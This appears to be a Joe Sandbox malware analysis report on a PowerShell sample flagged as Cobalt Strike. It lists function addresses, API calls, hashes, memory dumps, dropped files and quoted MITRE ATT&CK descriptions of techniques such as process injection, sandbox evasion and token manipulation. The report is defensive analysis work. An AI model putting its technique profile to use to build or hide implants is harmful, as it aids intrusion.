Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction ID: add057eed1f8ab2b1e92716d2704fd7101760738a22d0b8d42d79d2c6ea9debc
Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
Instruction Fuzzy Hash: E6C11D36705B84CAE760CF69E48439E77A4F39AB84F144129EB8D87B59DF38C459CB01

Function 000001A6ED2FA144 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2FA178

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

free.LIBCMT ref: 000001A6ED2FA2BF
free.LIBCMT ref: 000001A6ED2FA323
free.LIBCMT ref: 000001A6ED2FA32F

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
Instruction ID: 38ac3165cdc6b2f1602b38e92d88a0bc6d2a092d4e386f5e1ebb2aaa67d016dd
Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
Instruction Fuzzy Hash: 9151D539302245C9FA98EB2D94503ED6391BBA3B80F6C4C259F0A67B96DF79C50D8712

Function 000001A6ED34AD44 Relevance: 5.2, APIs: 4, Instructions: 155COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED34AD78

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

free.LIBCMT ref: 000001A6ED34AEBF
free.LIBCMT ref: 000001A6ED34AF23
free.LIBCMT ref: 000001A6ED34AF2F

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: free$_errno$AllocHeap_callnewhmalloc
String ID:
API String ID: 3531731211-0
Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction ID: 2a405dd0e1b6f2ae0ad5b2080fb6d25dfb69b7a6d606bf12195f79037028f451
Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
Instruction Fuzzy Hash: 7151D67E302745D1EA18EB2AD8543EA7391BBA3784F1C0425AE1A177D6DF7EC40E8702

Function 000001A6ED2E3700 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2E3763

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 02107860626bca7ccddeef960abcbd6ecc30b597906c44ed17d0f9ab3b0aaf00
Instruction ID: a92c3a81ff9c157ff1571bdda3dcb1b610d81961c1872e13965019cad0a4e977
Opcode Fuzzy Hash: 02107860626bca7ccddeef960abcbd6ecc30b597906c44ed17d0f9ab3b0aaf00
Instruction Fuzzy Hash: AB41E63A702780CBEB96CB7A94106ED33A1F766B86F588524DF1A47785DF34D809C701

Function 000001A6ED334300 Relevance: 5.1, APIs: 4, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED334363

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction ID: 80037d4d59724976187049063fe21b03265afdcb45970ea042151e3f92333d1e
Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
Instruction Fuzzy Hash: 6E41863A301680CBEB58DB2AA5146DE73A1F767B84F484535DE7A47785DF38D809C701

Function 000001A6ED341038 Relevance: 5.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 000001A6ED349170: GetCurrentProcess.KERNEL32 ref: 000001A6ED349188

GetLastError.KERNEL32 ref: 000001A6ED3410A7

Part of subcall function 000001A6ED34CF60: NtReadVirtualMemory.NTDLL ref: 000001A6ED34CFA8

malloc.LIBCMT ref: 000001A6ED34113C
free.LIBCMT ref: 000001A6ED341185
GetLastError.KERNEL32 ref: 000001A6ED3411B5

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: ErrorLast$CurrentMemoryProcessReadVirtualfreemalloc
String ID:
API String ID: 3766285061-0
Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction ID: 159ec4c670bc64b5613095007107299c8aac53fd24e7e4473e6a5aefb830842d
Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
Instruction Fuzzy Hash: 8241B67A316A41C1E760DB2AE5407EF6391E7A77C8F085415AE8947BCAEF3EC14A8701

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report oEFrY6Xcyl.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz4awws3.543.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u31gyipb.z3t.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G9P8OZBN16ZF2GF28T7C.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
oEFrY6Xcyl.ps1

Function 000001A6ED331184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
encryptionCOMMONLIBRARYCODE

Function 00007FFD347983D5 Relevance: .5, Instructions: 508
COMMON

Function 000001A6ED33EA48 Relevance: 9.1, APIs: 6, Instructions: 109
networkCOMMONLIBRARYCODE

Function 000001A6ED33F014 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 000001A6ED33F118 Relevance: 3.0, APIs: 2, Instructions: 42
networkCOMMONLIBRARYCODE

Function 000001A6ED2F96B4 Relevance: 1.6, APIs: 1, Instructions: 149
libraryCOMMON

Function 00007FFD347991A8 Relevance: .1, Instructions: 148
COMMON

Function 00007FFD34794045 Relevance: .0, Instructions: 49
COMMON

Function 00007FFD347992DF Relevance: .0, Instructions: 41
COMMON

Function 00007FFD34861D6F Relevance: .0, Instructions: 32
COMMON

Function 000001A6ED356514 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460
COMMONLIBRARYCODE